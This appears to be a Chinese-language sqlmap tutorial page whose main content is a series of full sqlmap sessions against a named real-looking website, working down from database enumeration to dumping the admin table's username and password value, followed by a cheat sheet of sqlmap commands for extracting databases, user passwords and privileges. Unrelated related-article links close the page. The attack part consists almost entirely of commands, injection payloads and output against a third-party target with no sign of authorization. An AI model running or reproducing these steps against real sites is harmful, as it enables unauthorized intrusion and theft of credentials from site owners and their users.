注:标黄处为输入内容     批注为得到的信息

1.-u url --dbs 爆数据库

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dbs

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:23:20

[15:23:21] [INFO] resuming back-end DBMS 'mysql'

[15:23:21] [INFO] testing connection to the target url

[15:23:22] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:23:22] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:23:22] [INFO] fetching database names

[15:23:22] [INFO] the SQL query used returns 5 entries

[15:23:22] [INFO] resumed: "information_schema"

[15:23:22] [INFO] resumed: "gold"

[15:23:22] [INFO] resumed: "mysql"

[15:23:22] [INFO] resumed: "performance_schema"

[15:23:22] [INFO] resumed: "test"

available databases [5]:

[*] gold

[*] information_schema

[*] mysql

[*] performance_schema

[*] test

[15:23:23] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:23:23

2. -u url --tables -D 数据库 //爆表段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --tables -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:52:54

[15:52:54] [INFO] resuming back-end DBMS 'mysql'

[15:52:55] [INFO] testing connection to the target url

[15:52:56] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:52:56] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:52:56] [INFO] fetching tables for database: 'gold'

[15:52:58] [INFO] the SQL query used returns 5 entries

[15:52:59] [INFO] retrieved: "admin"

[15:53:00] [INFO] retrieved: "article"

[15:53:01] [INFO] retrieved: "class"

[15:53:02] [INFO] retrieved: "content"

[15:53:03] [INFO] retrieved: "djjl"

Database: gold

[5 tables]

+---------+

| admin   |

| article |

| class   |

| content |

| djjl    |

+---------+

[15:53:04] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:53:04

3. -u url --columns -T 表段 -D 数据库 //爆字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --columns -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 15:58:10

[15:58:10] [INFO] resuming back-end DBMS 'mysql'

[15:58:10] [INFO] testing connection to the target url

[15:58:12] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[15:58:12] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[15:58:12] [INFO] fetching columns for table 'admin' in database 'gold'

[15:58:13] [INFO] the SQL query used returns 3 entries

[15:58:14] [INFO] retrieved: "id","int(2)"

[15:58:15] [INFO] retrieved: "user","char(12)"

[15:58:16] [INFO] retrieved: "password","char(36)"

Database: gold

Table: admin

[3 columns]

+----------+----------+

| Column   | Type     |

+----------+----------+

| id       | int(2)   |

| password | char(36) |

| user     | char(12) |

+----------+----------+

[15:58:17] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 15:58:17

4.-u url --dump -C 字段 -T 表段 -D 数据库 //猜解

(1) 猜解password字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C password -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:02:05

[16:02:05] [INFO] resuming back-end DBMS 'mysql'

[16:02:05] [INFO] testing connection to the target url

[16:02:06] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:02:06] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:02:06] [INFO] fetching entries of column(s) 'password' for table 'admin' in

database 'gold'

[16:02:08] [INFO] the SQL query used returns 1 entries

[16:02:09] [INFO] retrieved: "ecoDz4IPZGYNs"

[16:02:09] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+---------------+

| password      |

+---------------+

| ecoDz4IPZGYNs |

+---------------+

[16:02:09] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:02:09] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:02:09

(2) 猜解id字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C id -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:22

[16:10:22] [INFO] resuming back-end DBMS 'mysql'

[16:10:22] [INFO] testing connection to the target url

[16:10:23] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:23] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:23] [INFO] fetching entries of column(s) 'id' for table 'admin' in databa

se 'gold'

[16:10:24] [INFO] the SQL query used returns 1 entries

[16:10:25] [INFO] retrieved: "1"

[16:10:25] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+----+

| id |

+----+

| 1  |

+----+

[16:10:25] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:25] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:25

(3) 猜解user字段

[root@Hacker~]# Sqlmap -u http://www.lbgold.com/article_show.php?id=1826 --dump -C user -T admin -D gold

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program

[*] starting at 16:10:48

[16:10:48] [INFO] resuming back-end DBMS 'mysql'

[16:10:48] [INFO] testing connection to the target url

[16:10:49] [INFO] heuristics detected web page charset 'UTF-8'

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1826 AND 8515=8515

Type: UNION query

Title: MySQL UNION query (NULL) - 11 columns

Payload: id=1826 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6e7

46d3a,0x74437972455a4d666447,0x3a747a793a), NULL, NULL, NULL, NULL, NULL, NULL,

NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1826 AND SLEEP(5)

---

[16:10:49] [INFO] the back-end DBMS is MySQL

web server operating system: Windows Vista

web application technology: ASP.NET, PHP 5.4.4, Microsoft IIS 7.0

back-end DBMS: MySQL 5.0.11

[16:10:49] [INFO] fetching entries of column(s) 'user' for table 'admin' in data

base 'gold'

[16:10:49] [INFO] the SQL query used returns 1 entries

[16:10:50] [INFO] retrieved: "ssb"

[16:10:51] [INFO] analyzing table dump for possible password hashes

Database: gold

Table: admin

[1 entry]

+------+

| user |

+------+

| ssb  |

+------+

[16:10:51] [INFO] table 'gold.admin' dumped to CSV file 'E:\SQLMAP~2\Bin\output\

www.lbgold.com\dump\gold\admin.csv'

[16:10:51] [INFO] fetched data logged to text files under 'E:\SQLMAP~2\Bin\outpu

t\www.lbgold.com'

[*] shutting down at 16:10:51

[root@Hacker~]# Sqlmap

5.sqlmap工具的使用命令

mssql access 直接爆表.然后你懂的

BT5里面的话前面就要加python

sqlmap.py -u url --dbs //爆数据库

sqlmap.py -u url --current-db //爆当前库

sqlmap.py -u url --current-user //爆当前用户

sqlmap.py -u url --users   查看用户权限

sqlmap.py -u url --tables -D 数据库 //爆表段

sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断

sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba

sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户

sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码

sqlmap.py -u url --privileges -v 0 这是判断当前的权限

sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内

sqlmap.py -u url --dump -all -v 0

sqlmap 使用方法及实例的更多相关文章

  1. React构建单页应用方法与实例

    React作为目前最流行的前端框架之一,其受欢迎程度不容小觑,从这门框架上我们可以学到许多其他前端框架所缺失的东西,也是其创新性所在的地方,比如虚拟DOM.JSX等.那么接下来我们就来学习一下这门框架 ...

  2. Redux状态管理方法与实例

    状态管理是目前构建单页应用中不可或缺的一环,也是值得花时间学习的知识点.React官方推荐我们使用Redux来管理我们的React应用,同时也提供了Redux的文档来供我们学习,中文版地址为http: ...

  3. JQuery 获取json数据$.getJSON方法的实例代码

    这篇文章介绍了JQuery 获取json数据$.getJSON方法的实例代码,有需要的朋友可以参考一下 前台: function SelectProject() { var a = new Array ...

  4. (转)Java 的swing.GroupLayout布局管理器的使用方法和实例

    摘自http://www.cnblogs.com/lionden/archive/2012/12/11/grouplayout.html (转)Java 的swing.GroupLayout布局管理器 ...

  5. Springmvc+Spring+Hibernate搭建方法及实例

    Springmvc+Spring+Hibernate搭建方法及实例  

  6. jQuery中on()方法用法实例详解

    这篇文章主要介绍了jQuery中on()方法用法,实例分析了on()方法的功能及各种常见的使用技巧,并对比分析了与bind(),live(),delegate()等方法的区别,需要的朋友可以参考下 本 ...

  7. (转)多个mapreduce工作相互依赖处理方法完整实例(JobControl)

    多个mapreduce工作相互依赖处理方法完整实例(JobControl) 原文地址:http://mntms.iteye.com/blog/2096456?utm_source=tuicool&am ...

  8. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  9. Java——静态变量/方法与实例变量/方法的区别

    静态只能调用静态 非静态: 对象名.方法名 package ti; //通过两个类 StaticDemo.LX4_1 说明静态变量/方法与实例变量/方法的区别. class StaticDemo { ...

随机推荐

  1. 开启linux下面vsftp自身的服务

    最近业务需求搞了一下sftp,配合samba感觉还是不错的. 上干货:笔者的环境是centos7.4 1.建立一个名为sftpusers的sftp用户组 groupadd sftpusers 2.建立 ...

  2. opensns功能详解

    <!DOCTYPE html> opensns功能详解 wmd-preview h1 { color: #0077bb; /* 将标题改为蓝色 */ } opensns功能详解 软件工程 ...

  3. linux下nano命令大全

    nano是一个字符终端的文本编辑器,有点像DOS下的editor程序.它比vi/vim要简单得多,比较适合Linux初学者使用.某些Linux发行版的默认编辑器就是nano. nano命令可以打开指定 ...

  4. codeforces 1B 模拟

    题目大意: 给出两种行列位置的表示方法,一个是Excel表示法,一个是(R,C)坐标表示.给出一种表示,输出另外一种表示. 基本思路: 模拟,首先判断是哪一种表示法,然后转换成另外一种表示方法: 我做 ...

  5. vue v-modle修饰符.number .trim

    语法糖: 在不影响功能的情况下,添加某种方法实现同样的效果,从而方便程序开发. .number:可以将输入转换成Number类型,否则虽然输入的是数字,但它的类型其实是String. .trim:自动 ...

  6. php时间时间戳

    /* *+ ------------------------------- * 计算当天起始点和结束点时间戳 取出当天的数据 *+ ------------------------------ */ ...

  7. 树的性质——cf1244D

    特别简单,只有链的形式才符合要求,那么枚举前两个点的颜色搞一下就可以 #include <bits/stdc++.h> using namespace std; ][],pos[],ok= ...

  8. 使用java.util.Properties工具制作自定义访问配置文件信息

    import ch.qos.logback.classic.Logger; import org.slf4j.LoggerFactory; import java.io.IOException; im ...

  9. Linux启动过程的C语言代码分析

    1. main函数 参见上方http://www.cnblogs.com/long123king/p/3543872.html,代码跳转到main函数. arch/x86/boot/main.c 1: ...

  10. PAT_A1095#Cars on Campus

    Source: PAT A1095 Cars on Campus (30 分) Description: Zhejiang University has 8 campuses and a lot of ...